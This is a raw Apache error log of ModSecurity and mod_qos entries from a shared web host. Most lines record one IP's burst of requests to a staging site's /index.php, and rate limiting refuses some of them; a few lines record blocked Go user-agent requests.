[Tue May 26 20:00:00.275120 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz41gAAAG0"]
[Tue May 26 20:00:00.280533 2026] [security2:error] [pid 106517:tid 106762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VyAAAAPQ"]
[Tue May 26 20:00:00.291111 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1V1QAAAOM"]
[Tue May 26 20:00:00.296027 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz47AAAAAk"]
[Tue May 26 20:00:00.305477 2026] [security2:error] [pid 106517:tid 106754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1V0QAAAOw"]
[Tue May 26 20:00:00.305915 2026] [security2:error] [pid 106517:tid 106680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1V0gAAAKI"]
[Tue May 26 20:00:00.308670 2026] [security2:error] [pid 106517:tid 106652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1V1AAAAIc"]
[Tue May 26 20:00:00.310806 2026] [security2:error] [pid 93576:tid 93799] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz44gAAAFc"]
[Tue May 26 20:00:00.311035 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1V0wAAALU"]
[Tue May 26 20:00:00.313244 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz47wAAACI"]
[Tue May 26 20:00:00.325524 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4-wAAAHo"]
[Tue May 26 20:00:00.335857 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4_wAAAEM"]
[Tue May 26 20:00:00.339043 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz49gAAAH4"]
[Tue May 26 20:00:00.342210 2026] [security2:error] [pid 106517:tid 106684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1V0AAAAKY"]
[Tue May 26 20:00:00.350607 2026] [security2:error] [pid 106517:tid 106714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WGAAAAMQ"]
[Tue May 26 20:00:00.353553 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz49AAAABo"]
[Tue May 26 20:00:00.367971 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4_AAAADw"]
[Tue May 26 20:00:00.378951 2026] [security2:error] [pid 106517:tid 106767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WAwAAAPk"]
[Tue May 26 20:00:00.389967 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz49QAAAB0"]
[Tue May 26 20:00:00.398052 2026] [security2:error] [pid 106517:tid 106746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WGQAAAOQ"]
[Tue May 26 20:00:00.398330 2026] [security2:error] [pid 106517:tid 106763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WCQAAAPU"]
[Tue May 26 20:00:00.403245 2026] [security2:error] [pid 106517:tid 106682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WEQAAAKQ"]
[Tue May 26 20:00:00.404103 2026] [security2:error] [pid 106517:tid 106742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WEgAAAOA"]
[Tue May 26 20:00:00.406543 2026] [security2:error] [pid 106517:tid 106704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WEAAAALo"]
[Tue May 26 20:00:00.418126 2026] [security2:error] [pid 106517:tid 106768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WEwAAAPo"]
[Tue May 26 20:00:00.419172 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WHQAAANI"]
[Tue May 26 20:00:00.424609 2026] [security2:error] [pid 106517:tid 106758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WJQAAAPA"]
[Tue May 26 20:00:00.424771 2026] [security2:error] [pid 106517:tid 106664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WJAAAAJM"]
[Tue May 26 20:00:00.432213 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ2DRMqfxdEDkosz5OAAAADI"]
[Tue May 26 20:00:00.434512 2026] [security2:error] [pid 106517:tid 106710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WIAAAAMA"]
[Tue May 26 20:00:00.435220 2026] [security2:error] [pid 106517:tid 106770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WKgAAAPw"]
[Tue May 26 20:00:00.441724 2026] [security2:error] [pid 106517:tid 106709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WIgAAAL8"]
[Tue May 26 20:00:00.453846 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WGwAAANc"]
[Tue May 26 20:00:00.457509 2026] [security2:error] [pid 93576:tid 93722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ2DRMqfxdEDkosz5NgAAAAo"]
[Tue May 26 20:00:00.595947 2026] [security2:error] [pid 106517:tid 106653] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WWQAAAIg"]
[Tue May 26 20:00:00.636696 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuaGDRMqfxdEDkosz5wgAAAG8
[Tue May 26 20:00:00.636960 2026] [qos:error] [pid 93576:tid 93765] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuaGDRMqfxdEDkosz5uwAAADU
[Tue May 26 20:00:00.637029 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuaGDRMqfxdEDkosz5uQAAAEA
[Tue May 26 20:00:00.637039 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuaGDRMqfxdEDkosz5vAAAAHU
[Tue May 26 20:00:00.637135 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuaGDRMqfxdEDkosz5wwAAAFI
[Tue May 26 20:00:00.637698 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuaGDRMqfxdEDkosz5xAAAAFA
[Tue May 26 20:00:00.640390 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuaGDRMqfxdEDkosz5yQAAADQ
[Tue May 26 20:00:00.640556 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuaGDRMqfxdEDkosz5ywAAAGs
[Tue May 26 20:00:00.643161 2026] [qos:error] [pid 106517:tid 106664] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuaIZZc2DoU1lPnP1WngAAAJM
[Tue May 26 20:00:00.646254 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuaGDRMqfxdEDkosz5zwAAAHo
[Tue May 26 20:00:00.773887 2026] [security2:error] [pid 106517:tid 106696] [client 103.125.146.81:47739] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/file.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WowAAALI"]
[Tue May 26 20:00:00.785465 2026] [qos:error] [pid 93576:tid 93723] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz50wAAAAs
[Tue May 26 20:00:00.787923 2026] [qos:error] [pid 106517:tid 106770] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaIZZc2DoU1lPnP1WpAAAAPw
[Tue May 26 20:00:00.789683 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz51AAAABA
[Tue May 26 20:00:00.789864 2026] [qos:error] [pid 106517:tid 106672] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaIZZc2DoU1lPnP1WpQAAAJs
[Tue May 26 20:00:00.790768 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz51QAAAHU
[Tue May 26 20:00:00.793518 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:58014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz51gAAAFA
[Tue May 26 20:00:00.793891 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz51wAAAFE
[Tue May 26 20:00:00.795758 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz52AAAAFI
[Tue May 26 20:00:00.799426 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz52QAAAAc
[Tue May 26 20:00:00.801492 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz52gAAACU
[Tue May 26 20:00:00.933981 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz53AAAAAY
[Tue May 26 20:00:00.936493 2026] [qos:error] [pid 106517:tid 106656] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaIZZc2DoU1lPnP1WqAAAAIs
[Tue May 26 20:00:00.942955 2026] [qos:error] [pid 106517:tid 106772] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaIZZc2DoU1lPnP1WqQAAAP4
[Tue May 26 20:00:00.942956 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz53gAAABw
[Tue May 26 20:00:00.943362 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz53QAAAAU
[Tue May 26 20:00:00.945274 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:58014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz53wAAADI
[Tue May 26 20:00:00.951156 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz54AAAABQ
[Tue May 26 20:00:00.953131 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz54QAAACo
[Tue May 26 20:00:00.955380 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz54gAAAA0
[Tue May 26 20:00:00.957120 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz54wAAADQ
[Tue May 26 20:00:01.082264 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz56AAAAC8
[Tue May 26 20:00:01.173018 2026] [qos:error] [pid 106517:tid 106778] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaYZZc2DoU1lPnP1WrgAAAQQ
[Tue May 26 20:00:01.177726 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz57AAAAEs
[Tue May 26 20:00:01.177914 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz56gAAAFU
[Tue May 26 20:00:01.178387 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz57QAAAEs
[Tue May 26 20:00:01.178399 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz56wAAAC4
[Tue May 26 20:00:01.179196 2026] [qos:error] [pid 93576:tid 93730] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz57gAAABI
[Tue May 26 20:00:01.179377 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:58014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz57wAAAGE
[Tue May 26 20:00:01.181174 2026] [qos:error] [pid 106517:tid 106653] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaYZZc2DoU1lPnP1WrwAAAIg
[Tue May 26 20:00:01.181871 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz58AAAAFg
[Tue May 26 20:00:01.230350 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz58QAAAE0
[Tue May 26 20:00:01.276264 2026] [security2:error] [pid 106517:tid 106752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WKAAAAOo"]
[Tue May 26 20:00:01.282287 2026] [security2:error] [pid 106517:tid 106760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WJwAAAPI"]
[Tue May 26 20:00:01.291918 2026] [security2:error] [pid 106517:tid 106669] [client 103.163.220.31:38903] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/languages/plugins/"] [unique_id "ahWuaYZZc2DoU1lPnP1WsgAAAJg"]
[Tue May 26 20:00:01.302342 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ2DRMqfxdEDkosz5PAAAAEQ"]
[Tue May 26 20:00:01.304340 2026] [security2:error] [pid 106517:tid 106734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WLQAAANg"]
[Tue May 26 20:00:01.306305 2026] [security2:error] [pid 106517:tid 106681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WMQAAAKM"]
[Tue May 26 20:00:01.313586 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ2DRMqfxdEDkosz5SAAAAGg"]
[Tue May 26 20:00:01.315947 2026] [security2:error] [pid 106517:tid 106777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WLAAAAQM"]
[Tue May 26 20:00:01.325418 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ2DRMqfxdEDkosz5RgAAAFw"]
[Tue May 26 20:00:01.334593 2026] [security2:error] [pid 106517:tid 106698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WLwAAALQ"]
